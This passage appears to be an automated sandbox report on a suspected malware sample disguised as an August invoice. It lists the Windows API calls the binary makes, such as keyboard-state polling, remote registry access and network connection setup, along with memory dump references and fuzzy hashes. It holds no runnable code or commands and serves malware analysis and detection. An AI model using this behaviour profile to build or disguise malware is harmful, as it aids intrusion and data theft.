                                                          • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                          • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                          • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                          • __swprintf.LIBCMT ref: 00460915
                                                          • __swprintf.LIBCMT ref: 0046092D
                                                          • _wprintf.LIBCMT ref: 004609E1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: HandleLoadModuleString__swprintf$_memmove_wcslen_wprintf
                                                          • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
                                                          • API String ID: 3054410614-2561132961
                                                          • Opcode ID: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                          • Instruction ID: 8ea7bd36613c7ff98b4c02c5a019b599898316a67ab96f708308d0ed756dbd7a
                                                          • Opcode Fuzzy Hash: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                          • Instruction Fuzzy Hash: 654183B29001099BDB00FBD1DC9AAEF7778EF44354F45403AF504B7192EB78AA45CBA9
                                                          APIs
                                                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                          • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
                                                          • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
                                                          • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
                                                          • CLSIDFromString.OLE32(?,?), ref: 004587B3
                                                          • RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
                                                          • RegCloseKey.ADVAPI32(?), ref: 004587C5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
                                                          • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                          • API String ID: 600699880-22481851
                                                          • Opcode ID: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                          • Instruction ID: 095cb2d92039a6881e8bf561e9cb0619f72fc8c68408713302cc045b8cca0367
                                                          • Opcode Fuzzy Hash: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                          • Instruction Fuzzy Hash: 58415275D0020DABCB04EBA4DC45ADE77B8EF48304F10846EE914B7291EF78A909CB94
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: DestroyWindow
                                                          • String ID: static
                                                          • API String ID: 3375834691-2160076837
                                                          • Opcode ID: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                          • Instruction ID: e571488c54e010bbe3192cf51c39f0d33963e2fa0fa89bc12fd4c8100c345edb
                                                          • Opcode Fuzzy Hash: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                          • Instruction Fuzzy Hash: 2C41B375200205ABDB149F64DC85FEB33A8EF89725F20472AFA15E72C0D7B4E841CB68
                                                          APIs
                                                          • SetErrorMode.KERNEL32(00000001), ref: 0045D959
                                                          • GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
                                                          • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: ErrorMode$DriveType
                                                          • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
                                                          • API String ID: 2907320926-3566645568
                                                          • Opcode ID: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                          • Instruction ID: 8c6a7395db7573f60177d60b7e789de744ab79b943898383e565048f237880a7
                                                          • Opcode Fuzzy Hash: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                          • Instruction Fuzzy Hash: B7316E35A042049BCB10FFA9C48595EB771FF88315B1088ABFD05AB392C739DD45CB6A
                                                          APIs
                                                            • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                          • DestroyAcceleratorTable.USER32(?), ref: 0047094A
                                                          • ImageList_Destroy.COMCTL32(?), ref: 004709AD
                                                          • ImageList_Destroy.COMCTL32(?), ref: 004709C5
                                                          • ImageList_Destroy.COMCTL32(?), ref: 004709D5
                                                          • DeleteObject.GDI32(00610000), ref: 00470A04
                                                          • DestroyIcon.USER32(004C005C), ref: 00470A1C
                                                          • DeleteObject.GDI32(8938D156), ref: 00470A34
                                                          • DestroyWindow.USER32(006E006F), ref: 00470A4C
                                                          • DestroyIcon.USER32(?), ref: 00470A73
                                                          • DestroyIcon.USER32(?), ref: 00470A81
                                                          • KillTimer.USER32(00000000,00000000), ref: 00470B00
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateKillRectTableTimerWindow
                                                          • String ID:
                                                          • API String ID: 1237572874-0
                                                          • Opcode ID: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                          • Instruction ID: 3938066daea6daae9dc0c39577387909b3bcb8112bd91d3310d64c2ecda3814a
                                                          • Opcode Fuzzy Hash: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                          • Instruction Fuzzy Hash: 24616874601201CFE714DF65DD94FAA77B8FB6A304B54856EE6098B3A2CB38EC41CB58
                                                          APIs
                                                          • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
                                                          • SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
                                                          • VariantInit.OLEAUT32(?), ref: 004793E1
                                                          • SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
                                                          • VariantCopy.OLEAUT32(?,?), ref: 00479461
                                                          • SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
                                                          • VariantClear.OLEAUT32(?), ref: 00479489
                                                          • SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
                                                          • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
                                                          • VariantClear.OLEAUT32(?), ref: 004794CA
                                                          • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                          • String ID:
                                                          • API String ID: 2706829360-0
                                                          • Opcode ID: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                                          • Instruction ID: 8c269571b42c1441f814514f03b92edd351012a73d8239c9f379a0a89e1b4ae1
                                                          • Opcode Fuzzy Hash: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                                          • Instruction Fuzzy Hash: F6515E76A00119ABCB00DFA5DD849DEB7B9FF88704F10856EE905A7241DB749E06CBA4
                                                          APIs
                                                          • GetKeyboardState.USER32(?), ref: 0044480E
                                                          • GetAsyncKeyState.USER32(000000A0), ref: 00444899
                                                          • GetKeyState.USER32(000000A0), ref: 004448AA
                                                          • GetAsyncKeyState.USER32(000000A1), ref: 004448C8
                                                          • GetKeyState.USER32(000000A1), ref: 004448D9
                                                          • GetAsyncKeyState.USER32(00000011), ref: 004448F5
                                                          • GetKeyState.USER32(00000011), ref: 00444903
                                                          • GetAsyncKeyState.USER32(00000012), ref: 0044491F
                                                          • GetKeyState.USER32(00000012), ref: 0044492D
                                                          • GetAsyncKeyState.USER32(0000005B), ref: 00444949
                                                          • GetKeyState.USER32(0000005B), ref: 00444958
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: State$Async$Keyboard
                                                          • String ID:
                                                          • API String ID: 541375521-0
                                                          • Opcode ID: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                          • Instruction ID: 827c2ee343902556a703916e37c968ecd50c133e95067caf6822082f003788d3
                                                          • Opcode Fuzzy Hash: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                          • Instruction Fuzzy Hash: 27412B34A047C969FF31A6A4C8043A7BBA16FA1314F04805FD5C5477C1DBED99C8C7A9
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: InitVariant$_malloc_wcscpy_wcslen
                                                          • String ID:
                                                          • API String ID: 3413494760-0
                                                          • Opcode ID: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                                                          • Instruction ID: 93a03e1dde4748921c3f7e50244c45dc9774a8ad470eaa8d68eb3f4e8808ad8d
                                                          • Opcode Fuzzy Hash: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                                                          • Instruction Fuzzy Hash: 33414BB260070AAFC754DF69C880A86BBE8FF48314F00862AE619C7750D775E564CBE5
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: AddressProc_free_malloc$_strcat_strlen
                                                          • String ID: AU3_FreeVar
                                                          • API String ID: 2634073740-771828931
                                                          • Opcode ID: b7b62cf44ead268743cea15c23fa0702c80810b5d7796ec40f0430e9877b9643
                                                          • Instruction ID: 8d08e60933d1045585c44e473594da8d0bbfd8a8652ecee4fcef853dc29158a1
                                                          • Opcode Fuzzy Hash: b7b62cf44ead268743cea15c23fa0702c80810b5d7796ec40f0430e9877b9643
                                                          • Instruction Fuzzy Hash: 00B1ADB4A00206DFCB00DF55C880A6AB7A5FF88319F2485AEED058F352D739ED95CB94
                                                          APIs
                                                          • CoInitialize.OLE32 ref: 0046C63A
                                                          • CoUninitialize.OLE32 ref: 0046C645
                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                            • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
                                                            • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
                                                          • CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
                                                          • CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
                                                          • CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
                                                          • IIDFromString.OLE32(?,?), ref: 0046C705
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize_malloc
                                                          • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                          • API String ID: 2294789929-1287834457
                                                          • Opcode ID: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                                                          • Instruction ID: adb6a6f601bf1a612e569d1fac1689f55b30b767fcafa950e0578031a668eb85
                                                          • Opcode Fuzzy Hash: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                                                          • Instruction Fuzzy Hash: B861BC712043019FD710EF21D885B7BB3E8FB84715F10891EF9859B241E779E909CBAA
                                                          APIs
                                                            • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
                                                            • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
                                                            • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
                                                            • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
                                                          • DefDlgProcW.USER32(?,00000205,?,?), ref: 00471145
                                                          • ImageList_DragLeave.COMCTL32(00000000), ref: 00471163
                                                          • ImageList_EndDrag.COMCTL32 ref: 00471169
                                                          • ReleaseCapture.USER32 ref: 0047116F
                                                          • SetWindowTextW.USER32(?,00000000), ref: 00471206
                                                          • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                                          • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                          • API String ID: 2483343779-2107944366
                                                          • Opcode ID: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                                                          • Instruction ID: f70d9246110d4513cc5ea0640624bfdb04bec8758509bedf4130776013c57ff9
                                                          • Opcode Fuzzy Hash: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                                                          • Instruction Fuzzy Hash: D751E5706002109FD700EF59CC85BAF77A5FB89310F004A6EF945A72E2DB789D45CBAA
                                                          APIs
                                                          • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
                                                          • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
                                                          • _wcslen.LIBCMT ref: 00450720
                                                          • _wcscat.LIBCMT ref: 00450733
                                                          • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
                                                          • SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window_wcscat_wcslen
                                                          • String ID: -----$SysListView32
                                                          • API String ID: 4008455318-3975388722
                                                          • Opcode ID: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                          • Instruction ID: d83f74bd31ff7b91e94eebeff09b40632409ca0fd113a8de7250d6f1aa6a1b31
                                                          • Opcode Fuzzy Hash: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                          • Instruction Fuzzy Hash: 9C51D470500308ABDB24CF64CD89FEE77A5EF98304F10065EF944A72C2D3B99959CB58
                                                          APIs
                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                          • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
                                                          • GetDlgCtrlID.USER32(00000000), ref: 00469C84
                                                          • GetParent.USER32 ref: 00469C98
                                                          • SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
                                                          • GetDlgCtrlID.USER32(00000000), ref: 00469CA5
                                                          • GetParent.USER32 ref: 00469CBC
                                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$CtrlParent$_memmove_wcslen
                                                          • String ID: ComboBox$ListBox
                                                          • API String ID: 2360848162-1403004172
                                                          • Opcode ID: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                          • Instruction ID: b77daa4920d68b7dc7b38413de7e2b04daab878370679d8231203fb1b5b646ea
                                                          • Opcode Fuzzy Hash: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                          • Instruction Fuzzy Hash: 0121E7716001187BDB00AB69CC85ABF779CEB85320F00855BFA149B2D1D6B8D845C7A5
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
